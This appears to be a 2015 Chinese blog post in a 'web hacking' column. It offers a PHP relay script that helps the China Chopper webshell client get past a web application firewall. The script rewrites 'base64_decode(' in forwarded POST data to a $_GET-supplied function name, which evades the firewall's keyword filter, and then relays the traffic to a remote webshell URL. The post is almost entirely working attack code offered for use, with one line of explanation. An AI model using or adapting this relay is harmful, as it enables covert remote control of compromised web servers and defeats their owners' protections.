菜刀杀狗

于 2015-01-29 21:15:51 发布
阅读量667 收藏
点赞数
分类专栏: 编程 web hacking

中转是一种思路,把狗拦截的关键字以一种等效的方式替换为其他的。

<?php 
$webshell="http://www.example.com/1.php";//把这里改成你的shell地址 
$webshell=$webshell."?&1141056911=base64_decode";
 
$da=$_POST; 
$data = $da; 
@$data=str_replace("base64_decode(",'$_GET[1141056911](',$data); 
//接收菜刀的post,并把base64_decode替换成$_GET[1141056911](
 
//print_r($data); 
 
$data = http_build_query($data);   
$opts = array (   
'http' => array (   
'method' => "POST",   
'header'=> "Content-type: application/x-www-form-urlencoded\r\n" .   
           "Content-Length: " . strlen($data) . "\r\n",   
'content' => $data) 
); 
 
$context = stream_context_create($opts);   
$html = @file_get_contents($webshell, false, $context); //发送post  
echo $html;   
 
?>

原文:http://zone.wooyun.org/content/10278


eT48_Sec
关注
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值